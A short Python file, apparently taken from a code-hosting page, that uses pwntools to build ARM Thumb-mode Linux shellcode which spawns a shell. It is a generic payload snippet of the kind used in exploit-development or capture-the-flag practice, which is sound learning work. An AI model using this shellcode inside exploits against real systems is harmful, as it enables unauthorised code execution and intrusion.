shellcode.py 136 Bytes Raw Blame History Permalink 1 2 3 4 5 6 7 8 from pwn import * context.update(arch='arm', os='linux') shellcode = shellcraft.to_thumb() shellcode += shellcraft.thumb.linux.sh()